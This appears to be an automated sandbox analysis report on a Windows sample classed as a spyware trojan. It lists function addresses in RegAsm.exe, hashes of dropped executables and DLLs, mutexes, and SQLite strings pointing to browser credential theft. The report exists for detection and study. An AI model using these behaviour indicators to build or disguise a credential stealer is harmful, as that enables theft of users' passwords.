Code function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess,

3_2_0040145B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041C3CB	3_2_0041C3CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D893	3_2_0042D893
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D123	3_2_0042D123
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00419463	3_2_00419463
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042DC7B	3_2_0042DC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D4C1	3_2_0042D4C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042CC8E	3_2_0042CC8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041B66B	3_2_0041B66B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1A6C00	3_2_6C1A6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1BAC30	3_2_6C1BAC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0EAC60	3_2_6C0EAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C13ECD0	3_2_6C13ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0DECC0	3_2_6C0DECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C268D20	3_2_6C268D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1AED70	3_2_6C1AED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C20AD50	3_2_6C20AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C176D90	3_2_6C176D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0E4DB0	3_2_6C0E4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C26CDC0	3_2_6C26CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1C0E20	3_2_6C1C0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C17EE70	3_2_6C17EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C166E90	3_2_6C166E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0EAEC0	3_2_6C0EAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C180EC0	3_2_6C180EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C220F20	3_2_6C220F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0E6F10	3_2_6C0E6F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C14EF40	3_2_6C14EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1A2F70	3_2_6C1A2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C228FB0	3_2_6C228FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0EEFB0	3_2_6C0EEFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1BEFF0	3_2_6C1BEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0E0FE0	3_2_6C0E0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C130820	3_2_6C130820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C16A820	3_2_6C16A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1B4840	3_2_6C1B4840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1E68E0	3_2_6C1E68E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C136900	3_2_6C136900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C118960	3_2_6C118960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1A09B0	3_2_6C1A09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1709A0	3_2_6C1709A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C19A9A0	3_2_6C19A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1149F0	3_2_6C1149F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1FC9E0	3_2_6C1FC9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C18EA00	3_2_6C18EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C198A30	3_2_6C198A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C15CA70	3_2_6C15CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C15EA80	3_2_6C15EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C180BA0	3_2_6C180BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1E6BE0	3_2_6C1E6BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C16A430	3_2_6C16A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C144420	3_2_6C144420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0F8460	3_2_6C0F8460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C20A480	3_2_6C20A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1264D0	3_2_6C1264D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C17A4D0	3_2_6C17A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C138540	3_2_6C138540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1E4540	3_2_6C1E4540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C180570	3_2_6C180570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C228550	3_2_6C228550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C142560	3_2_6C142560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0D45B0	3_2_6C0D45B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C16E5F0	3_2_6C16E5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1AA5E0	3_2_6C1AA5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C13C650	3_2_6C13C650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1046D0	3_2_6C1046D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C13E6E0	3_2_6C13E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C17E6E0	3_2_6C17E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C160700	3_2_6C160700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C10A7D0	3_2_6C10A7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1A8010	3_2_6C1A8010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1AC000	3_2_6C1AC000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C12E070	3_2_6C12E070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0D8090	3_2_6C0D8090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1BC0B0	3_2_6C1BC0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C0F00B0	3_2_6C0F00B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C156130	3_2_6C156130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1C4130	3_2_6C1C4130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C148140	3_2_6C148140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040F140	9_2_0040F140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040F7C0	9_2_0040F7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041B054	9_2_0041B054
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041E070	9_2_0041E070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00401000	9_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00412001	9_2_00412001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00410000	9_2_00410000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004230CB	9_2_004230CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00444110	9_2_00444110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040913D	9_2_0040913D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041A1C0	9_2_0041A1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00425198	9_2_00425198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00442262	9_2_00442262
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042E223	9_2_0042E223
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004092C5	9_2_004092C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004012F0	9_2_004012F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00427370	9_2_00427370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00414374	9_2_00414374
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00441330	9_2_00441330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00442380	9_2_00442380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00401388	9_2_00401388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004123B0	9_2_004123B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00422480	9_2_00422480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040A4A0	9_2_0040A4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004265A2	9_2_004265A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00423640	9_2_00423640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00427640	9_2_00427640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00423624	9_2_00423624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043D630	9_2_0043D630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004426B0	9_2_004426B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042C752	9_2_0042C752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00440750	9_2_00440750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040D7D0	9_2_0040D7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004437E0	9_2_004437E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00403790	9_2_00403790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00441840	9_2_00441840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00423940	9_2_00423940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00438965	9_2_00438965
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00409909	9_2_00409909
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00407980	9_2_00407980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004299B5	9_2_004299B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00424A4F	9_2_00424A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00410A70	9_2_00410A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00412A2C	9_2_00412A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00443AF0	9_2_00443AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040BA90	9_2_0040BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00432B60	9_2_00432B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00437B00	9_2_00437B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040EB20	9_2_0040EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00410BE0	9_2_00410BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00406BB0	9_2_00406BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00428C5E	9_2_00428C5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00412C3C	9_2_00412C3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041CC90	9_2_0041CC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00441D50	9_2_00441D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00422D6A	9_2_00422D6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042CD06	9_2_0042CD06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042BD10	9_2_0042BD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00413D23	9_2_00413D23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00419D22	9_2_00419D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00443DE0	9_2_00443DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00428E63	9_2_00428E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00404EC0	9_2_00404EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00406F70	9_2_00406F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00426F10	9_2_00426F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040FFDE	9_2_0040FFDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00440FE0	9_2_00440FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00409F80	9_2_00409F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040AF80	9_2_0040AF80

Source: Joe Sandbox View	Dropped File: C:\ProgramData\BAAEHDBFID.exe DE30491736617249B3E80FC9436ECF0F7675B3C3014509398C3DB7298F93336A
Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004104E7 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040C590 appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C103620 appears 49 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C109B10 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040DF50 appears 178 times

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000002.1714302071.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameVQP.exe@ vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BAAEHDBFID.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@16/24@13/11

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

3_2_00411807

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\ProgramData\BAAEHDBFID.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2393719883.00000000203E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2388519146.000000001A478000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2393719883.00000000203E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2388519146.000000001A478000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2393719883.00000000203E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2388519146.000000001A478000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2393719883.00000000203E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2388519146.000000001A478000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2393719883.00000000203E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2388519146.000000001A478000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000003.00000002.2393719883.00000000203E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2388519146.000000001A478000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2393719883.00000000203E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2388519146.000000001A478000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2393719883.00000000203E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2388519146.000000001A478000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000003.00000002.2393719883.00000000203E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2388519146.000000001A478000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: HDAFII.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
